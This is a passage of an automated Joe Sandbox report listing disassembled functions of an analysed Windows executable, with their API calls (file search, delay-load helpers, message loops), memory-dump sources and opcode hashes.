                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 2d559cd68878f3b967c9b75095b3bf24aafe7cd825cf1c998bd115763f135419
                                              • Instruction ID: fbcb0c43b759b1ce2dd31184857fc71d1ffe001cbebff17310be55b774eaa247
                                              • Opcode Fuzzy Hash: 2d559cd68878f3b967c9b75095b3bf24aafe7cd825cf1c998bd115763f135419
                                              • Instruction Fuzzy Hash: DCE06532505211D6EA2967A6DC01F9F7A489F417B0F39412CEE68D6591CB60CE0091A1
                                              Function 00C9F711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00C9F826: __EH_prolog3_GS.LIBCMT ref: 00C9F830
                                                • Part of subcall function 00C9F826: FindFirstFileW.KERNELBASE(?,?,00000274,00C9F733,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?), ref: 00C9F859
                                                • Part of subcall function 00C9F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F8A4
                                                • Part of subcall function 00C9F826: GetLastError.KERNEL32(?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049,?,00000000), ref: 00C9F902
                                              • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00C9A684,?,?,00000000,?,?,?,?,?,?), ref: 00C9F739
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                              • String ID:
                                              • API String ID: 765066492-0
                                              • Opcode ID: bbf333f71206d743227ca2583549087b3221571dcee68bbff612ae8c3cb407b7
                                              • Instruction ID: 971d6417312fad3f2cc6402389eaae2fbf8250d8f301c858b9991469d57d2ee1
                                              • Opcode Fuzzy Hash: bbf333f71206d743227ca2583549087b3221571dcee68bbff612ae8c3cb407b7
                                              • Instruction Fuzzy Hash: 74F0A732009790AECE225BA48808B8B7FE06F27374F044B0DF4FD52592C230D455AB22
                                              Function 00CA73F8 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00CA742D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExecutionStateThread
                                              • String ID:
                                              • API String ID: 2211380416-0
                                              • Opcode ID: 7de44550b3c8bc435efbe57502454feda18dc72f17d4bca4b95d4fe3a7f44405
                                              • Instruction ID: 5bb0d00e890efedb577fdccc27c2be5f724f88034650d9540c2f7da393e88a31
                                              • Opcode Fuzzy Hash: 7de44550b3c8bc435efbe57502454feda18dc72f17d4bca4b95d4fe3a7f44405
                                              • Instruction Fuzzy Hash: 4AD05B1170915127FF1537696D897FD1A069FC7319F09007BF14557183CE94088AF7E6
                                              Function 00C911DD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C91206
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Concurrency::cancel_current_task
                                              • String ID:
                                              • API String ID: 118556049-0
                                              • Opcode ID: 679acea3c257f309f3b37c7a6b0c56e7ba53015130158bd6b89df0f0531ea031
                                              • Instruction ID: c5e27c8e8e7049c4429de9c87682d57b303c84b8582677c87f4617007475a22d
                                              • Opcode Fuzzy Hash: 679acea3c257f309f3b37c7a6b0c56e7ba53015130158bd6b89df0f0531ea031
                                              • Instruction Fuzzy Hash: E2D05E76612A038E8F2DFB34C46B86E77905F60305754462DF43BCA681DF22CD15E619
                                              Function 00CAEB06 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GdipAlloc.GDIPLUS(00000010), ref: 00CAEB0C
                                                • Part of subcall function 00CAE849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAE86A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                              • String ID:
                                              • API String ID: 1915507550-0
                                              • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                              • Instruction ID: 870d7c9aefa0edbfd50c70776158d8037952116d5d9b9942ce387713f6a85e61
                                              • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                              • Instruction Fuzzy Hash: C3D0A93020020ABBDF022B219C02ABE7A98EF02348F008021B80285290EAB0EA10A2E4
                                              Function 00CB4231 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00CB4256
                                                • Part of subcall function 00CB0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB0689
                                                • Part of subcall function 00CB0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB069A
                                                • Part of subcall function 00CB0678: IsDialogMessageW.USER32(00010464,?), ref: 00CB06AE
                                                • Part of subcall function 00CB0678: TranslateMessage.USER32(?), ref: 00CB06BC
                                                • Part of subcall function 00CB0678: DispatchMessageW.USER32(?), ref: 00CB06C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                              • String ID:
                                              • API String ID: 897784432-0
                                              • Opcode ID: d8b796aec95d5e4201cdd266d40e1ca62cc1f3b3d63ce840d66ee4fa6933060b
                                              • Instruction ID: 52594495d22ceb1cdc333f8e712491853bc3b799df1797300d74e9f1c1eb184f
                                              • Opcode Fuzzy Hash: d8b796aec95d5e4201cdd266d40e1ca62cc1f3b3d63ce840d66ee4fa6933060b
                                              • Instruction Fuzzy Hash: 96D09E31144200AAD6122B51CE06F0E7AE2AB98B09F004654B745740F1C6629E31AB16
                                              Function 00CB4D2C Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CB4DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00CB4DF2
                                              • DloadProtectSection.DELAYIMP ref: 00CB4D54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AcquireDloadExclusiveLockProtectSection
                                              • String ID:
                                              • API String ID: 3680172570-0
                                              • Opcode ID: 567bc3bcc64e748589e43fe3e1d2558cc30a1d69065891aba3505837e4ec89df
                                              • Instruction ID: b87074f971b57f35c263f5a65aa66b85002a1dc4ad0716a4170bcf4eae435b80
                                              • Opcode Fuzzy Hash: 567bc3bcc64e748589e43fe3e1d2558cc30a1d69065891aba3505837e4ec89df
                                              • Instruction Fuzzy Hash: AED0123520C5E4AED71DBB79DD8A7DC2360B30430CF800515F2618A1A7CF784A50A601
                                              Function 00C9E152 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileType.KERNELBASE(000000FF,00C9E052,?,?,?,00000000,00C9E5D2,?,?,00000000,?,00000000), ref: 00C9E15E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              • Opcode ID: 2e9c46462f64f5f02b02fa2f2eb1030aeef892fe6310e800b3ef99baf3fa01e0
                                              • Instruction ID: 8bb492cf1e523ae1da146384778460bf8d09e94b026a5de0163ed639f71433ea
                                              • Opcode Fuzzy Hash: 2e9c46462f64f5f02b02fa2f2eb1030aeef892fe6310e800b3ef99baf3fa01e0
                                              • Instruction Fuzzy Hash: 4DC00234400209D68E218A28D88D59D7622AB627A67B8A795D03D895A2C732CE97EA11
                                              Function 00CB49C1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 104a3d173492ca474b51e6244ae84ce7ebf00cf3226f233734b03384e98c65cf
                                              • Instruction ID: f2a80af36828b103996dac25f008a436374c8a858e1846d365bb705ca0ee68d1
                                              • Opcode Fuzzy Hash: 104a3d173492ca474b51e6244ae84ce7ebf00cf3226f233734b03384e98c65cf
                                              • Instruction Fuzzy Hash: 31B012E169D240FC334C52563D03C7F030EC1C0B50B31472BF004C2543E4404C801031
                                              Function 00CB49D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: c39b584cb3fc597096b20291a25c5fbae93aa34c6ec1369fc4a79ee41485ec5d
                                              • Instruction ID: 33b749bdd98d6447facec60ac93f4d4eb9d5e77fc4dd151fb897fd2abfd671a2
                                              • Opcode Fuzzy Hash: c39b584cb3fc597096b20291a25c5fbae93aa34c6ec1369fc4a79ee41485ec5d
                                              • Instruction Fuzzy Hash: 39B012D16AD140FC320C51563D03C7B034FC5C0B50B31472FF004C2543E4404C401031
                                              Function 00CB498F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b1b98f24f425c1efbcf1d350f78d4624feaffc9bb38af258ec6426caeaf78de4
                                              • Instruction ID: 8c17661a22d20a1283d9a8fe048a7b42e5f6a8068c2e494b53731cb2973b043e
                                              • Opcode Fuzzy Hash: b1b98f24f425c1efbcf1d350f78d4624feaffc9bb38af258ec6426caeaf78de4
                                              • Instruction Fuzzy Hash: 17B012E169C180FC320C51563D03C7B030DC1C1B50730872BF405C2143F4404D501131
                                              Function 00CB4985 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 409e49d2f219dc01e4a505d45abebc28f007f2ab321aeef7004ae7bf926d3277
                                              • Instruction ID: 119e859c23ed131d58d8531b3102ded2aee4f0e5a92b2d54fdcce2a469198dec
                                              • Opcode Fuzzy Hash: 409e49d2f219dc01e4a505d45abebc28f007f2ab321aeef7004ae7bf926d3277
                                              • Instruction Fuzzy Hash: 7CB012D169C140FC320C51A63D03C7B030DC1C0B507308B2FF004C2243E4404C441031
                                              Function 00CB4999 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5c5d328aca2ded58adc642b9dd103b4e401981537932359a90aacf04843d9472
                                              • Instruction ID: 27d19762eaf0c6f6aa0a584f5b767657a144ec7c84d0d3be37a1fdca9073a6d7
                                              • Opcode Fuzzy Hash: 5c5d328aca2ded58adc642b9dd103b4e401981537932359a90aacf04843d9472
                                              • Instruction Fuzzy Hash: 37B012E169C280FC334C51563D03C7B030DC1C0B50730472BF005C2143F4404D901031
                                              Function 00CB49A3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f4b0d372a3d0891997ddfb27bea824eff48af6580718881420298d3b7acb56d3
                                              • Instruction ID: 80cffc0ba0935566faa18fd9422191dbfcb10c969edb133a336e8bd6a36fdd4e
                                              • Opcode Fuzzy Hash: f4b0d372a3d0891997ddfb27bea824eff48af6580718881420298d3b7acb56d3
                                              • Instruction Fuzzy Hash: 89B012E169C180FC320C51563E03C7B030EC1C0B50730472BF405C2143F4414E521031
                                              Function 00CB49B7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 30ee5d842a8de198cfdbf545122165c69af10590dcf0e3cb9c52df1ed2d7fe47
                                              • Instruction ID: c109b6bdcba5017517a135d44554936c221e98c498c393abd39e8b0ed8586f0f
                                              • Opcode Fuzzy Hash: 30ee5d842a8de198cfdbf545122165c69af10590dcf0e3cb9c52df1ed2d7fe47
                                              • Instruction Fuzzy Hash: 41B012D169D140FC320C51563D03C7B030EC1C1B50B31873BF404C2583E4404C401131
                                              Function 00CB4949 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 4be53d8c857c1a64aa7d71403fc4ca13c2eae2005ecc51f619b816f6695b4220
                                              • Instruction ID: 10e645ef12f9cf89e15b0e66e1179de1df8367760432be5bbbbe2be69bf1d6a1
                                              • Opcode Fuzzy Hash: 4be53d8c857c1a64aa7d71403fc4ca13c2eae2005ecc51f619b816f6695b4220
                                              • Instruction Fuzzy Hash: AAB012D569C340FC374C51963D03C7B030DC1C0B50730472BF004C2243E4404C801031
                                              Function 00CB495D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4918
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
